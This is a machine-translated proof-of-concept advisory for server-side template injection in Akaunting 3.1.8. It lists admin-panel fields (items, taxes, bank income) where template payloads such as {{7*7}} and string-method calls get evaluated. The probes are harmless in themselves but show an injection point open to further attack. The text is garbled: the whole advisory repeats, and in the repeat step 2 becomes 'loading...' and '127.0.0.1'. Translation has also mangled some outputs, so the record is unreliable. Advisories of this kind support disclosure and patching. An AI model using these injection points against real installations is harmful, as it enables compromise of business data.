#利用标题: Akaunting 3.1.8-服务器端模板注入(SSTI)
#利用作者: TMRSWRR
#日期: 30/05/2024
#vendor: https://akaunting.com/forum
#软件link: https://akaunting.com/apps/crm
#脆弱版本: 3.1.8
#测试: https://www.softaculous.com/apps/erp/akaunting
1)使用管理员登录,然后转到:个项目新项目
2)写SSTI有效载荷: {{7*7}}名称字段,写销售和购买价格随机数
3)保存
4)您将看到结果:
49
==================================================================================================
1)用管理员登录并转到:SETTING税新税
2)写SSTI有效载荷: {{7*7}}名称字段,写销售和购买价格随机数
3)保存
4)您将看到结果:
49
{{'a'.touppercase()}}
一个
{{'a'.concat('b')}}}
ab
==================================================================================================
1)用管理员登录,然后转到:银行交易新收入
2)写SSTI有效载荷: {{7*7}}描述字段
3)保存
4)您将看到结果:
49
{{'a'.touppercase()}}
一个
{{'a'.concat('b')}}}
ab
====================================================================================================================
1)用管理员登录
2)写SSTI有效载荷: {{7*7}}名称字段
3)保存
4)您将看到结果:
49
{{'a'.touppercase()}}
一个
{{'a'.concat('b')}}}
ab
#利用作者: TMRSWRR
#日期: 30/05/2024
#vendor: https://akaunting.com/forum
#软件link: https://akaunting.com/apps/crm
#脆弱版本: 3.1.8
#测试: https://www.softaculous.com/apps/erp/akaunting
1)使用管理员登录,然后转到:个项目新项目
正在加载...
127.0.0.1
3)保存
4)您将看到结果:
49
==================================================================================================
1)用管理员登录并转到:SETTING税新税
正在加载...
127.0.0.1
3)保存
4)您将看到结果:
49
{{'a'.touppercase()}}
一个
{{'a'.concat('b')}}}
ab
==================================================================================================
1)用管理员登录,然后转到:银行交易新收入
正在加载...
127.0.0.1
3)保存
4)您将看到结果:
49
{{'a'.touppercase()}}
一个
{{'a'.concat('b')}}}
ab
====================================================================================================================
1)用管理员登录
正在加载...
127.0.0.1
3)保存
4)您将看到结果:
49
{{'a'.touppercase()}}
一个
{{'a'.concat('b')}}}
ab
